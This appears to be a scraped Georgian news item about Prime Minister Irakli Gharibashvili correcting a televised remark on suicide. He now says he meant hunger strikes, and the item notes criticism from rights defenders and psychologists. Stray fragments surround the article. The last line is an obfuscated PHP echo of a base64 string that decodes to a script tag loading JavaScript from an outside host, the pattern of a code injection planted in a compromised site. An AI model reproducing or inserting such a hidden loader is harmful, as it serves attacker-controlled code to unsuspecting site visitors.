celsiusi
ავერსი საქკაბელი
პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა ტვ „იმედის“ ეთერში გაასწორა თავისივე ფრაზა, რომელიც მან გუშინ, 28 ოქტომბერს, ამავე ტელეარხის ეთერში თქვა.
 
„თუ ადამიანი გადაწყვეტს, რომ თავი მოიკლას, შეუძლია, მოიკლას, მაგრამ ამაზე, რა თქმა უნდა, სახელმწიფო ვერ აიღებს პასუხისმგებლობას“ - აღნიშნა ირაკლი ღარიბაშვილმა 28 ოქტომბერს.
 
მისი ეს ფრაზა უარყოფითა შეაფასეს როგორც უფლებადამცველებმა, ასევე ფსიქოლოგებმა და ფსიქიატრებმა, რომლებმაც ვრცლად ისაუბრეს იმ პოტენციურ ზიანზე, რაც შეიძლება თანამდებობის პირის მხრიდან მსგავს გამონათქვამს შეიძლება მოჰყვეს.
 
დღეს კი საქართველოს პრემიერმინისტრმა თავისი ნათქვამი ასე გაასწორა:
 
„ბუნებრივია, მე გუშინ ვსაუბრობდი შიმშილობაზე და შიმშილობის დეფინიცია განსაზღვრულია კანონმდებლობაში. ამაზე მქონდა მე საუბარი. შემდეგ საუბარი იყო თვითმკვლელობაზე და შეიძლება, ჩემი ნათქვამის არასწორი ინტერპრეტაცია მოხდა.
 
რა თქმა უნდა, ყველა ადამიანის, დაკავებულის უფლებაა შიმშილობის უფლება და მე ვთქვი, რომ ადამიანს და პატიმარს ვერ ავუკრძალავთ შიმშილობას. მე უნდა მეთქვა შიმშილობა და არა თვითმკვლელობა. ალბათ, ამით ერთგვარი არასწორი ინტერპრეტაცია მოხდა“.
 
889
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");